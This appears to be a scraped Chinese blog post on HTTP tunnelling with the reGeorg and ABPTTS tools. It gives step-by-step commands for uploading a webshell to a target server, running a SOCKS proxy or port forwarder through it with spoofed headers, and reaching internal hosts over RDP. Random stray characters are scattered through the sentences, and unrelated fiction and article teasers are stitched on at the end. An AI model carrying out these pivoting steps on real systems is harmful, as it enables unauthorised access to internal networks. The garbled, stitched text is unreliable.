HTTP隧道

一柜蜈、reGeorg

下載地址：https://github.com/gorgiaxx/reGeorg

1. 上傳webshell并訪問

http://1.1.1.1:8888/tunnel.jsp

image.png

2. 本地運行reGeorgSocksProxy.py

python reGeorgSocksProxy.py -p 4444 -u http://1.1.1.1:8888/tunnel.jsp
python reGeorgSocksProxy.py -p 8080 -r 4096 -w 4096 -u http://1.1.1.1:8000/hackable/uploads/tunnel.php --custom-headers "{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36', 'Referer': 'www.baidu.com'}"

image.png

3. 配置Proxifier
   添加服務(wù)器server：

image.png

添加規(guī)則rule，設(shè)置成默認(rèn)拒絕：

image.png

4. 配置完成后，mstsc.exe打開方式選擇Proxifier哼鬓，然后輸入內(nèi)網(wǎng)ip即可連接目標(biāo)服務(wù)器

image.png

二、ABPTTS

下載地址：https://github.com/nccgroup/ABPTTS.git

1. 下載并配置ABPTTS

python2 -m pip install pycrypto
python2 -m pip install httplib2
git clone https://github.com/nccgroup/ABPTTS.git
python abpttsfactory.py -o webshell

2. 上傳webshell并訪問

image.png

3. 訪問本機(jī)的1080端口屋摇，相當(dāng)于訪問目標(biāo)的80端口

python abpttsclient.py -c webshell/config.txt -u "http://1.1.1.1:8080/abptts/abptts.jsp" -f 192.168.80.218:1080/192.168.111.4:80

image.png

• 人面猴

  序言：七十年代末偶洋，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子侣滩，更是在濱河造成了極大的恐慌口注，老刑警劉巖，帶你破解...

  沈念sama閱讀 218,122評論 6贊 505
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件君珠，死亡現(xiàn)場離奇詭異寝志，居然都是意外死亡，警方通過查閱死者的電腦和手機(jī)策添，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 93,070評論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門材部，熙熙樓的掌柜王于貴愁眉苦臉地迎上來，“玉大人唯竹，你說我怎么就攤上這事乐导。” “怎么了浸颓？”我有些...

  開封第一講書人閱讀 164,491評論 0贊 354
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵物臂，是天一觀的道長。 經(jīng)常有香客問我产上，道長棵磷，這世上最難降的妖魔是什么？ 我笑而不...

  開封第一講書人閱讀 58,636評論 1贊 293
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任晋涣，我火速辦了婚禮仪媒，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘谢鹊。我一直安慰自己算吩，他們只是感情好，可當(dāng)我...

  茶點故事閱讀 67,676評論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來的

  文/花漫 我一把揭開白布佃扼。 她就那樣靜靜地躺著偎巢，像睡著了一般。 火紅的嫁衣襯著肌膚如雪兼耀。 梳的紋絲不亂的頭發(fā)上压昼，一...

  開封第一講書人閱讀 51,541評論 1贊 305
• 城市分裂傳說

  那天挎扰，我揣著相機(jī)與錄音，去河邊找鬼巢音。 笑死遵倦，一個胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的官撼。 我是一名探鬼主播梧躺，決...

  沈念sama閱讀 40,292評論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼傲绣！你這毒婦竟也來了掠哥？” 一聲冷哼從身側(cè)響起，我...

  開封第一講書人閱讀 39,211評論 0贊 276
• 萬榮殺人案實錄

  序言：老撾萬榮一對情侶失蹤秃诵，失蹤者是張志新（化名）和其女友劉穎续搀，沒想到半個月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體菠净，經(jīng)...

  沈念sama閱讀 45,655評論 1贊 314
• ?護(hù)林員之死

  正文 獨居荒郊野嶺守林人離奇死亡禁舷，尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點故事閱讀 37,846評論 3贊 336
• ?白月光啟示錄

  正文 我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了毅往。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片牵咙。...

  茶點故事閱讀 39,965評論 1贊 348
• 活死人

  序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖攀唯，靈堂內(nèi)的尸體忽然破棺而出洁桌，到底是詐尸還是另有隱情，我是刑警寧澤侯嘀，帶...

  沈念sama閱讀 35,684評論 5贊 347
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布另凌，位于F島的核電站，受9級特大地震影響戒幔，放射性物質(zhì)發(fā)生泄漏吠谢。R本人自食惡果不足惜，卻給世界環(huán)境...

  茶點故事閱讀 41,295評論 3贊 329
• 男人毒藥：我在死后第九天來索命

  文/蒙蒙 一溪食、第九天 我趴在偏房一處隱蔽的房頂上張望囊卜。 院中可真熱鬧娜扇，春花似錦错沃、人聲如沸。這莊子的主人今日做“春日...

  開封第一講書人閱讀 31,894評論 0贊 22
• 一樁弒父案枢析，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至刃麸，卻和暖如春醒叁，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背。 一陣腳步聲響...

  開封第一講書人閱讀 33,012評論 1贊 269
• 情欲美人皮

  我被黑心中介騙來泰國打工把沼， 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留啊易，地道東北人。 一個月前我還...

  沈念sama閱讀 48,126評論 3贊 370
• 代替公主和親

  正文 我出身青樓饮睬，卻偏偏與公主長得像租谈，于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子捆愁，可洞房花燭夜當(dāng)晚...

  茶點故事閱讀 44,914評論 2贊 355

推薦閱讀更多精彩內(nèi)容

• 面向?qū)ο蟮挠秒娦畔?shù)據(jù)交換協(xié)議

  國家電網(wǎng)公司企業(yè)標(biāo)準(zhǔn)（Q/GDW）- 面向?qū)ο蟮挠秒娦畔?shù)據(jù)交換協(xié)議 - 報批稿：20170802 前言： 排版 ...

  庭說閱讀 10,970評論 6贊 13
• webshell原理

  （源自摘抄整理）https://www.91ri.org/11494.html Webshell實現(xiàn)與隱藏探究 一...

  JackyTsuuuy閱讀 20,784評論 2贊 13
• vmtools特殊情況

  我的虛擬機(jī)打開了割去，vmware tools 也一直是灰色的，網(wǎng)上的那些點擊VMware tools安裝的方法都用不...

  S_s_s_a53f閱讀 459評論 0贊 0
• 30講拖延癥的速效救星丸

  1昼丑、“化整為零”就是指：降低難度呻逆，把事務(wù)分解到每天最小的單位。最后分解到的單位菩帝，一定是你心甘情愿去做事的單位咖城。這也...

  陳錦釗閱讀 289評論 0贊 0
• 【星點品鑒會】-王府井店

  時間：2017年12月3日 10:30 周日 地點：王府井星巴克 人物：mishell和星粉們 冬日里，和煦的陽光...

  小小玲仙兒閱讀 230評論 0贊 1